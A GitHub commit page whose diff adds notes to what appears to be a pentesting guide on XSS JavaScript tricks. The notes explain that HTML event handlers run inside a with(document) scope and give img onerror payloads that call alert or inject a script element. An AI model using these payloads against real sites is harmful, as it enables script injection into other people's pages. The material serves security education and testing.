Skip to content

Commit

Permalink
GITBOOK-3775: No subject
Browse files Browse the repository at this point in the history
  • Loading branch information
@carlospolop @gitbook-bot
carlospolop authored and gitbook-bot committed Feb 10, 2023
1 parent 003c985 commit 15b11b2
Showing 1 changed file with 11 additions and 0 deletions.
11 changes: 11 additions & 0 deletions pentesting-web/xss-cross-site-scripting/other-js-tricks.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -403,6 +403,17 @@ Error.prepareStackTrace=function(error, callSites){
2 callSites.shift().getThis().alert(1337);
3 };
4 new Error().stack

// From an HTML event
// Events from HTML are executed in this context
with(document) {
with(element) {
//executed event
}
}
// Because of that with(document) it's possible to access properties of document like:
<img src onerror=defaultView.alert(1337)>
<img src onerror=s=createElement('script');s.append('alert(1337)');appendChild(s)>
```
{% endcode %}
Expand Down

0 comments on commit 15b11b2

Please sign in to comment.